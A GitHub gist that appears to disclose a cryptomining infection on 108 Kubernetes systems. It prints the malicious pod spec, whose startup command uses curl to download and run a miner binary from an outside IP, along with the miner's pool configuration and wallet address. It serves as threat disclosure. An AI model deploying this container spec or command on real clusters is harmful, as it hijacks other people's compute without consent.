Instantly share code, notes, and snippets.

Embed
What would you like to do?
systems infected with miner for kubernetes

The following is appearing in 108 kubernetes systems that i have tracked so far.

"containers": [
                    {
                        "command": [
                            "sh",
                            "-c",
                            "curl -o /var/tmp/config.json http://192.99.142.232:8220/2.json;curl -o /var/tmp/suppoie http://192.99.142.232:8220/rig;chmod 777 /var/tmp/suppoie;cd /var/tmp;./suppoie -c config.json"
                        ],
                        "resources": {},
                        "image": "centos",
                        "imagePullPolicy": "Always",
                        "terminationMessagePath": "/dev/termination-log",
                        "volumeMounts": [
                            {
                                "mountPath": "/var/run/secrets/kubernetes.io/serviceaccount",
                                "readOnly": true,
                                "name": "default-token-gdcjb"
                            }
                        ],
                        "terminationMessagePolicy": "File",
                        "name": "myresd4"
                    }
                ]
                

The Command

It uses a centos image and runs the following command on start up

"command": [
                         "sh",
                         "-c",
                         "curl -o /var/tmp/config.json http://192.99.142.232:8220/2.json;curl -o /var/tmp/suppoie http://192.99.142.232:8220/rig;chmod 777 /var/tmp/suppoie;cd /var/tmp;./suppoie -c config.json"
                     ]
                     

The JSON miner configuration

http://192.99.142.232:8220/2.json 
{
 "algo": "cryptonight",  // cryptonight (default) or cryptonight-lite
 "av": 0,                // algorithm variation, 0 auto select
 "background": false,    // true to run the miner in the background
 "colors": true,         // false to disable colored output    
 "cpu-affinity": null,   // set process affinity to CPU core(s), mask "0x3" for cores 0 and 1
 "cpu-priority": 5,   // set process priority (0 idle, 2 normal to 5 highest)
 "donate-level": 1,      // donate level, mininum 1%
 "log-file": null,       // log all output to a file, example: "c:/some/path/xmrig.log"
 "max-cpu-usage": 95,    // maximum CPU usage for automatic mode, usually limiting factor is CPU cache not this option.  
 "print-time": 60,       // print hashrate report every N seconds
 "retries": 5,           // number of times to retry before switch to backup server
 "retry-pause": 5,       // time to pause between retries
 "safe": false,          // true to safe adjust threads and av settings for current CPU
 "threads": null,        // number of miner threads
 "pools": [
     {
         "url": "158.69.133.20:3333",   // URL of mining server
         "user": "4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg",                        // username for mining server
         "pass": "x",                       // password for mining server
         "keepalive": true,                 // send keepalived for prevent timeout (need pool support)
         "nicehash": false                  // enable nicehash/xmrig-proxy support
     },
     {
         "url": "192.99.142.249:3333",   // URL of mining server
         "user": "4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg",                        // username for mining server
         "pass": "x",                       // password for mining server
         "keepalive": true,                 // send keepalived for prevent timeout (need pool support)
         "nicehash": false                  // enable nicehash/xmrig-proxy support
     },
     {
         "url": "202.144.193.110:3333",   // URL of mining server
         "user": "4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg",                        // username for mining server
         "pass": "x",                       // password for mining server
         "keepalive": true,                 // send keepalived for prevent timeout (need pool support)
         "nicehash": false                  // enable nicehash/xmrig-proxy support
     }
 ],    
 "api": {
     "port": 0,                             // port for the miner API https://github.com/xmrig/xmrig/wiki/API
     "access-token": null,                  // access token for API
     "worker-id": null                      // custom worker-id for API
 }
}

Thanks

Thanks to the guys at @binaryedgeio for running some world wide scans for me!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment